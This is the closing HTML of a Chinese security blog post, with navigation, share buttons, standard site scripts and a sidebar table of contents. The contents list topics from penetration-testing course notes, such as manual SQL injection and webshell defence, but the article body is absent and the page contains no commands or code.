                <i class="fa fa-chevron-left"></i> 智能社：JavaScript教程-从入门到精通视频-整理笔记
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/posts/notes/《细说PHP》学习笔记.html" rel="prev" title="《细说PHP》学习笔记">
                《细说PHP》学习笔记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="posts/notes/安全牛：网络渗透与深度防御整理笔记.html"
           data-title="安全牛：网络渗透与深度防御视频-整理笔记" data-url="http://uknowsec.cn/posts/notes/安全牛：网络渗透与深度防御整理笔记.html">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20161122223514.jpg"
               alt="uknow" />
          <p class="site-author-name" itemprop="name">uknow</p>
          <p class="site-description motion-element" itemprop="description">不忘初心，方得始终</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">48</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/uknowsec" target="_blank">
                  
                    <i class="fa fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/3477219002" target="_blank">
                  
                    <i class="fa fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="" target="_blank">
                  
                    <i class="fa fa-globe"></i>
                  
                  Others
                </a>
              </span>
            
          
        </div>

        
        

        
        <div class="links-of-blogroll motion-element">
          
        </div>

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web加固"><span class="nav-number">1.</span> <span class="nav-text">Web加固</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#IIS加固"><span class="nav-number">1.1.</span> <span class="nav-text">IIS加固</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#防止数据下载"><span class="nav-number">1.2.</span> <span class="nav-text">防止数据下载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#NTFS-小到大"><span class="nav-number">1.3.</span> <span class="nav-text">NTFS:小到大</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#终级防网马-webshell"><span class="nav-number">1.4.</span> <span class="nav-text">终级防网马:webshell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#常用攻击方法"><span class="nav-number">2.</span> <span class="nav-text">常用攻击方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#爆库"><span class="nav-number">2.1.</span> <span class="nav-text">爆库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传webshell"><span class="nav-number">2.2.</span> <span class="nav-text">上传webshell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#手工注入Access"><span class="nav-number">3.</span> <span class="nav-text">手工注入Access</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#注入成因"><span class="nav-number">3.1.</span> <span class="nav-text">注入成因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#后台登录"><span class="nav-number">3.2.</span> <span class="nav-text">后台登录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断注入点"><span class="nav-number">3.3.</span> <span class="nav-text">判断注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断数据库类型"><span class="nav-number">3.4.</span> <span class="nav-text">判断数据库类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断表名"><span class="nav-number">3.5.</span> <span class="nav-text">判断表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断列名"><span class="nav-number">3.6.</span> <span class="nav-text">判断列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断字段长度"><span class="nav-number">3.7.</span> <span class="nav-text">判断字段长度</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断值"><span class="nav-number">3.8.</span> <span class="nav-text">判断值</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#手工注入MSSQL"><span class="nav-number">4.</span> <span class="nav-text">手工注入MSSQL</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#判断注入点-1"><span class="nav-number">4.1.</span> <span class="nav-text">判断注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看当前连接数据库的用户名"><span class="nav-number">4.2.</span> <span class="nav-text">查看当前连接数据库的用户名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看当前连接数据库"><span class="nav-number">4.3.</span> <span class="nav-text">查看当前连接数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看其他数据库"><span class="nav-number">4.4.</span> <span class="nav-text">查看其他数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断表名-1"><span class="nav-number">4.5.</span> <span class="nav-text">判断表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断其他表"><span class="nav-number">4.6.</span> <span class="nav-text">判断其他表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断列名-1"><span class="nav-number">4.7.</span> <span class="nav-text">判断列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断值-1"><span class="nav-number">4.8.</span> <span class="nav-text">判断值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#更改密码"><span class="nav-number">4.9.</span> <span class="nav-text">更改密码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mssql注入高级操作"><span class="nav-number">5.</span> <span class="nav-text">mssql注入高级操作</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#建立数据库用户"><span class="nav-number">5.1.</span> <span class="nav-text">建立数据库用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#数据库提权"><span class="nav-number">5.2.</span> <span class="nav-text">数据库提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#打开3389"><span class="nav-number">5.3.</span> <span class="nav-text">打开3389</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#建立系统用户"><span class="nav-number">5.4.</span> <span class="nav-text">建立系统用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#读系统写文件"><span class="nav-number">5.5.</span> <span class="nav-text">读系统写文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#备份拿一句话木马"><span class="nav-number">5.6.</span> <span class="nav-text">备份拿一句话木马</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#注入防范"><span class="nav-number">5.7.</span> <span class="nav-text">注入防范</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#手工注入MySQL"><span class="nav-number">6.</span> <span class="nav-text">手工注入MySQL</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#数据库的管理工具"><span class="nav-number">6.1.</span> <span class="nav-text">数据库的管理工具</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-ini"><span class="nav-number">6.2.</span> <span class="nav-text">php.ini</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#uion联合查询"><span class="nav-number">6.3.</span> <span class="nav-text">uion联合查询</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断用户名"><span class="nav-number">6.4.</span> <span class="nav-text">判断用户名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断版本号"><span class="nav-number">6.5.</span> <span class="nav-text">判断版本号</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断当前连接数据库"><span class="nav-number">6.6.</span> <span class="nav-text">判断当前连接数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断表名-2"><span class="nav-number">6.7.</span> <span class="nav-text">判断表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断值-2"><span class="nav-number">6.8.</span> <span class="nav-text">判断值</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#读文件-load-file"><span class="nav-number">6.9.</span> <span class="nav-text">读文件(load_file())</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#手工注入Oracle"><span class="nav-number">7.</span> <span class="nav-text">手工注入Oracle</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#猜字段数"><span class="nav-number">7.1.</span> <span class="nav-text">猜字段数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜哪个字段为字符串"><span class="nav-number">7.2.</span> <span class="nav-text">猜哪个字段为字符串</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜用户"><span class="nav-number">7.3.</span> <span class="nav-text">猜用户</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看版本信息"><span class="nav-number">7.4.</span> <span class="nav-text">查看版本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#看库名"><span class="nav-number">7.5.</span> <span class="nav-text">看库名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#看表数"><span class="nav-number">7.6.</span> <span class="nav-text">看表数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#看第一个表名"><span class="nav-number">7.7.</span> <span class="nav-text">看第一个表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看表的记录数"><span class="nav-number">7.8.</span> <span class="nav-text">查看表的记录数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看第一条记录"><span class="nav-number">7.9.</span> <span class="nav-text">查看第一条记录</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查看密码"><span class="nav-number">7.10.</span> <span class="nav-text">查看密码</span></a></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">uknow</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>




<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?3d5fd0365a60ecafb093d2d0df7aaf4c";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  


  




<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.min.js"></script>

  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js"></script>

  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=0.5.0"></script>


  <script type="text/javascript" src="/js/src/motion.js?v=0.5.0"></script>




  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=0.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=0.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=0.5.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"uknow"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
      <script src="/vendors/ua-parser-js/dist/ua-parser.min.js"></script>
      <script src="/js/src/hook-duoshuo.js"></script>
    
  





  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';                
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });
                            
                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').mousedown(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>

  
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
  </script>

  <script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  </script>

  
    <script type="text/javascript" src="http://cdn.staticfile.org/mathjax/2.4.0/MathJax.js"></script>
    <script type="text/javascript" src="http://cdn.staticfile.org/mathjax/2.4.0/config/TeX-AMS-MML_HTMLorMML.js"></script>
  


  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("AxgSweQqwlurwh9jQb8ilgOQ-gzGzoHsz", "ex42kl7W8LVpx0umFqv5YSIa");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script type="text/javascript" async src="//push.zhanzhang.baidu.com/push.js">
</script>

  

</body>
</html>
